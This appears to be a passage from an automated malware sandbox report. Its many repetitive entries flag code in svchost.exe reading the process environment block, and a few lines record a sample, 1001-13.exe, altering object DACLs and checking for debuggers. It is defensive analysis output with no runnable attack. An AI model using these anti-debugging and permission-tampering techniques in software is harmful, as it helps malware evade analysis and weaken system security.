                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6500 mov eax, dword ptr fs:[00000030h]2_2_036C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036325E0 mov eax, dword ptr fs:[00000030h]2_2_036325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C5ED mov eax, dword ptr fs:[00000030h]2_2_0366C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C5ED mov eax, dword ptr fs:[00000030h]2_2_0366C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E5CF mov eax, dword ptr fs:[00000030h]2_2_0366E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E5CF mov eax, dword ptr fs:[00000030h]2_2_0366E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036365D0 mov eax, dword ptr fs:[00000030h]2_2_036365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h]2_2_0366A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h]2_2_0366A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h]2_2_036545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h]2_2_036545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632582 mov eax, dword ptr fs:[00000030h]2_2_03632582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632582 mov ecx, dword ptr fs:[00000030h]2_2_03632582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03664588 mov eax, dword ptr fs:[00000030h]2_2_03664588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E59C mov eax, dword ptr fs:[00000030h]2_2_0366E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC460 mov ecx, dword ptr fs:[00000030h]2_2_036BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA456 mov eax, dword ptr fs:[00000030h]2_2_036EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362645D mov eax, dword ptr fs:[00000030h]2_2_0362645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365245A mov eax, dword ptr fs:[00000030h]2_2_0365245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C427 mov eax, dword ptr fs:[00000030h]2_2_0362C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A430 mov eax, dword ptr fs:[00000030h]2_2_0366A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036304E5 mov ecx, dword ptr fs:[00000030h]2_2_036304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036364AB mov eax, dword ptr fs:[00000030h]2_2_036364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036644B0 mov ecx, dword ptr fs:[00000030h]2_2_036644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BA4B0 mov eax, dword ptr fs:[00000030h]2_2_036BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA49A mov eax, dword ptr fs:[00000030h]2_2_036EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362CB7E mov eax, dword ptr fs:[00000030h]2_2_0362CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4B4B mov eax, dword ptr fs:[00000030h]2_2_036E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4B4B mov eax, dword ptr fs:[00000030h]2_2_036E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6B40 mov eax, dword ptr fs:[00000030h]2_2_036C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6B40 mov eax, dword ptr fs:[00000030h]2_2_036C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FAB40 mov eax, dword ptr fs:[00000030h]2_2_036FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D8B42 mov eax, dword ptr fs:[00000030h]2_2_036D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628B50 mov eax, dword ptr fs:[00000030h]2_2_03628B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DEB50 mov eax, dword ptr fs:[00000030h]2_2_036DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EB20 mov eax, dword ptr fs:[00000030h]2_2_0365EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EB20 mov eax, dword ptr fs:[00000030h]2_2_0365EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F8B28 mov eax, dword ptr fs:[00000030h]2_2_036F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F8B28 mov eax, dword ptr fs:[00000030h]2_2_036F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704B00 mov eax, dword ptr fs:[00000030h]2_2_03704B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]2_2_03638BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]2_2_03638BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]2_2_03638BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EBFC mov eax, dword ptr fs:[00000030h]2_2_0365EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BCBF0 mov eax, dword ptr fs:[00000030h]2_2_036BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]2_2_03650BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]2_2_03650BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]2_2_03650BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]2_2_03630BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]2_2_03630BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]2_2_03630BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DEBD0 mov eax, dword ptr fs:[00000030h]2_2_036DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640BBE mov eax, dword ptr fs:[00000030h]2_2_03640BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640BBE mov eax, dword ptr fs:[00000030h]2_2_03640BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4BB0 mov eax, dword ptr fs:[00000030h]2_2_036E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4BB0 mov eax, dword ptr fs:[00000030h]2_2_036E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]2_2_0366CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]2_2_0366CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]2_2_0366CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DEA60 mov eax, dword ptr fs:[00000030h]2_2_036DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036ACA72 mov eax, dword ptr fs:[00000030h]2_2_036ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036ACA72 mov eax, dword ptr fs:[00000030h]2_2_036ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640A5B mov eax, dword ptr fs:[00000030h]2_2_03640A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640A5B mov eax, dword ptr fs:[00000030h]2_2_03640A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA24 mov eax, dword ptr fs:[00000030h]2_2_0366CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EA2E mov eax, dword ptr fs:[00000030h]2_2_0365EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03654A35 mov eax, dword ptr fs:[00000030h]2_2_03654A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03654A35 mov eax, dword ptr fs:[00000030h]2_2_03654A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA38 mov eax, dword ptr fs:[00000030h]2_2_0366CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BCA11 mov eax, dword ptr fs:[00000030h]2_2_036BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366AAEE mov eax, dword ptr fs:[00000030h]2_2_0366AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366AAEE mov eax, dword ptr fs:[00000030h]2_2_0366AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]2_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]2_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]2_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630AD0 mov eax, dword ptr fs:[00000030h]2_2_03630AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03664AD0 mov eax, dword ptr fs:[00000030h]2_2_03664AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03664AD0 mov eax, dword ptr fs:[00000030h]2_2_03664AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638AA0 mov eax, dword ptr fs:[00000030h]2_2_03638AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638AA0 mov eax, dword ptr fs:[00000030h]2_2_03638AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686AA4 mov eax, dword ptr fs:[00000030h]2_2_03686AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704A80 mov eax, dword ptr fs:[00000030h]2_2_03704A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668A90 mov edx, dword ptr fs:[00000030h]2_2_03668A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]2_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]2_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]2_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E mov eax, dword ptr fs:[00000030h]2_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E mov edx, dword ptr fs:[00000030h]2_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E mov eax, dword ptr fs:[00000030h]2_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4978 mov eax, dword ptr fs:[00000030h]2_2_036D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4978 mov eax, dword ptr fs:[00000030h]2_2_036D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC97C mov eax, dword ptr fs:[00000030h]2_2_036BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0946 mov eax, dword ptr fs:[00000030h]2_2_036B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704940 mov eax, dword ptr fs:[00000030h]2_2_03704940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B892A mov eax, dword ptr fs:[00000030h]2_2_036B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C892B mov eax, dword ptr fs:[00000030h]2_2_036C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE908 mov eax, dword ptr fs:[00000030h]2_2_036AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE908 mov eax, dword ptr fs:[00000030h]2_2_036AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC912 mov eax, dword ptr fs:[00000030h]2_2_036BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628918 mov eax, dword ptr fs:[00000030h]2_2_03628918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628918 mov eax, dword ptr fs:[00000030h]2_2_03628918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE9E0 mov eax, dword ptr fs:[00000030h]2_2_036BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036629F9 mov eax, dword ptr fs:[00000030h]2_2_036629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036629F9 mov eax, dword ptr fs:[00000030h]2_2_036629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C69C0 mov eax, dword ptr fs:[00000030h]2_2_036C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036649D0 mov eax, dword ptr fs:[00000030h]2_2_036649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FA9D3 mov eax, dword ptr fs:[00000030h]2_2_036FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036309AD mov eax, dword ptr fs:[00000030h]2_2_036309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036309AD mov eax, dword ptr fs:[00000030h]2_2_036309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B89B3 mov esi, dword ptr fs:[00000030h]2_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B89B3 mov eax, dword ptr fs:[00000030h]2_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B89B3 mov eax, dword ptr fs:[00000030h]2_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE872 mov eax, dword ptr fs:[00000030h]2_2_036BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE872 mov eax, dword ptr fs:[00000030h]2_2_036BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6870 mov eax, dword ptr fs:[00000030h]2_2_036C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6870 mov eax, dword ptr fs:[00000030h]2_2_036C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03642840 mov ecx, dword ptr fs:[00000030h]2_2_03642840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660854 mov eax, dword ptr fs:[00000030h]2_2_03660854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634859 mov eax, dword ptr fs:[00000030h]2_2_03634859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634859 mov eax, dword ptr fs:[00000030h]2_2_03634859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]2_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]2_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]2_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652835 mov ecx, dword ptr fs:[00000030h]2_2_03652835
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E90B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00E90B62
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E62622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E62622
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E5083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E5083F
